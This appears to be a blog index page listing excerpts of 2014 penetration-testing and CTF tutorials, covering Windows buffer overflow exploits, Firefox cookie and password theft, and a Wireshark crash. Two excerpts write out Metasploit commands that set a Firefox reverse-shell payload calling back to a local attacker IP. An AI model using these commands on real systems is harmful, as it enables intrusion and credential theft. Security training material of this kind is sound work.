Skip to content
Hacking Articles

Recent Posts

  • AWS EC2 Credentials Theft via SSRF Abuse
  • Privacy Protection: Encrypted Notebooks
  • Privacy Protection: File Sharing
  • Privacy Protection: File Encryption
  • Credential Dumping with NetExec (nxc)

Most Used Categories

  • CTF Challenges (504)
    • VulnHub (311)
    • HackTheBox (164)
  • Penetration Testing (408)
  • Red Teaming (125)
  • Website Hacking (64)
  • Cyber Forensics (68)
  • Privilege Escalation (59)
  • Hacking Tools (33)
  • Pentest Lab Setup (29)

Hacking Articles

Raj Chandel's Blog

  • Courses We Offer
  • CTF Challenges
  • Penetration Testing
  • Web Penetration Testing
  • Red Teaming
  • Donate us
CTF Challenges, VulnHub

Hack the LAMPSecurity: CTF 5 (CTF Challenge)

July 9, 2014June 10, 2025 by Raj

Hello friends! Today we are going to take another CTF challenge known as LAMPSecurity CTF5 and it is another boot2root challenge provided for practice and

CTF Challenges, VulnHub

Hack the LAMPSecurity: CTF4 (CTF Challenge)

July 8, 2014June 10, 2025 by Raj

Hello friends! Today we are going to take another CTF challenge known as LAMPSecurity CTF4 and it is another boot2root challenge provided for practice and

Penetration Testing

Hack ALL Security Features in Remote Windows 7 PC

July 5, 2014May 27, 2025 by Raj

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC) How to Disable UAC protection (Get Admin Access) From MicrosoftUAC is a security

Penetration Testing

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

June 26, 2014May 27, 2025 by Raj

 This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled

Penetration Testing

Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

June 20, 2014May 27, 2025 by Raj

Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when

Penetration Testing

Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC

June 14, 2014May 27, 2025 by Raj

Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host) msf exploit (firefox_xpi_bootstrapped_addon)>set uripath / msf

Penetration Testing

Exploit Save Password in Mozilla Firefox in Remote Windows, Linux or MAC PC

June 13, 2014May 27, 2025 by Raj

Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host) msf exploit (firefox_xpi_bootstrapped_addon)>set uripath / msf

Penetration Testing

How to Gather MUICache Entries in Remote Windows PC

June 10, 2014May 27, 2025 by Raj

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of

Penetration Testing

How to Crash Running Wireshark of Remote PC using CAPWAP Dissector DoS

June 4, 2014May 27, 2025 by Raj

This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in

Posts pagination

Previous 1 … 145 146 147 … 153 Next

Categories

© All Rights Reserved 2024 Theme: Prefer by Template Sell.